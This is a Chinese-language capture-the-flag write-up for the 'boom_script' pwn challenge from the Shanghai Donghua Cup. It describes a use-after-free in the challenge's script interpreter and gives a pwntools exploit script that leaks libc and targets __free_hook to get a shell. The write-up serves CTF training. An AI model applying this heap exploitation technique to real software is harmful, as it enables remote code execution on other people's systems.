boom_script
这是上海东华杯的一道pwn题,是最难得,也是之前我没见到过得。这类题考的就是代码量巨大,逆向贼难,但是我们只要知道本质,一切就都简单了,这类题要着重注意malloc,free,还有栈溢出的危险函数。
分析:
1.直接运行程序,发现只有两个功能,一个run,一个help
help告诉我们程序能对哪些语法进行解释,可以run起来。
1
2
3
| printn是打印一个int型数据
prints是打印一个字符串
inputn是输入一个int型数据
|
2.如果定义一个变量a=“aaaaaaaaaaaaaaaa”;,就会malloc一个堆空间,将其数据放入这个堆空间内,然后再定义一个b,b=a的话,a和b就指向同一空间,再a=“”;,prints(b)就可以泄露。
a变量里有大于0x400的a,即malloc的size大小tcache,再通过调整a的长度就可以free掉,然后show(b)即可泄露。
3.既然有uaf,那这题打法就感觉有好多了,我们可以尝试去打free_hook,在free_hook处填入system,然后创建一个变量sh = “/bin/sh\x00”;即可,free掉这个堆块就能拿到shell。
array的修改是对偏移为0x28处的数据进行修改,所以有一个错位。先把array申请回来的chunk,再次释放,然后进行UAF利用就好。
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
libc = ELF("./libc.so.6")
p = process("./boom_script")
bss=0x76100
p.sendlineafter("$",'1')
code = '''
a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
b = a;
a = "aaaaaa";
prints(b);
c=0;
array arr[20];
arr[0] = 1;
b="bbbbbb"
a1="cccccccccccccccccccccccccccccccccccccccccccccccccccccccc";
tc1 = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee";
sss = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee";
aaa = "/bin/sh";
tc1 = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
sss = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
prints("eeee");
inputn(c);
arr[0] = c;
arr[1] = c;
'''
gdb.attach(p)
p.sendlineafter("length:",str(len(code)+1))
p.sendlineafter("code:",code)
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x1ebbe0
success("libc_base:"+hex(libc_base))
pause()
p.sendlineafter("eeee",str(libc_base+libc.sym["__free_hook"]))
pause()
p.interactive()
|